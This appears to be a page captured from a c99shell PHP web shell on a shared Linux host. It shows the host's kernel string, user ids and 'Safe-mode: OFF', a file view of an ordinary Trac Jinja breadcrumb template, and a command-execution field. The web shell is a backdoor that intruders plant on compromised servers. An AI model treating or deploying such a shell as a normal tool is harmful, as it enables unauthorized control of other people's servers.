Software: Apache. PHP/8.3.27 uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364) Safe-mode: OFF (not secure) /usr/lib/python3/dist-packages/trac/versioncontrol/templates/ drwxr-xr-x | |
| Viewing file: Select action/file-type: {# Copyright (C) 2008-2021 Edgewall Software This software is licensed as described in the file COPYING, which you should have received as part of this distribution. The terms are also available at https://trac.edgewall.org/wiki/TracLicense. This software consists of voluntary contributions made by many individuals. For the exact contribution history, see the revision history and logs, available at https://trac.edgewall.org/. #} {# Displays a sequence of path components. Each component is a link to the corresponding location in the browser. We expect the following variables to be available in the calling context: * `path_links`, a list of dicts each having the following keys: * `name`, the path component name * `href`, a link pointing to this path * `stickyrev`, the optional revision information to show * `reponame`, the optional repository name #} # if path_links: ## the realm: ${path_links[0].name} {# the/path/.../... Note: in the `for` loop below, we take great care of not introducing any space characters, so that one can easily copy the path to the clipboard. #} #- for part in path_links[1:]: ${part.name}{% if not loop.last %}/{% endif %} #- endfor #- endif # if stickyrev: # with drev = display_rev(stickyrev) @ ${drev} # endwith # endif ## jinjacheck: "(a a span span a br )" OK |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0115 ]-- |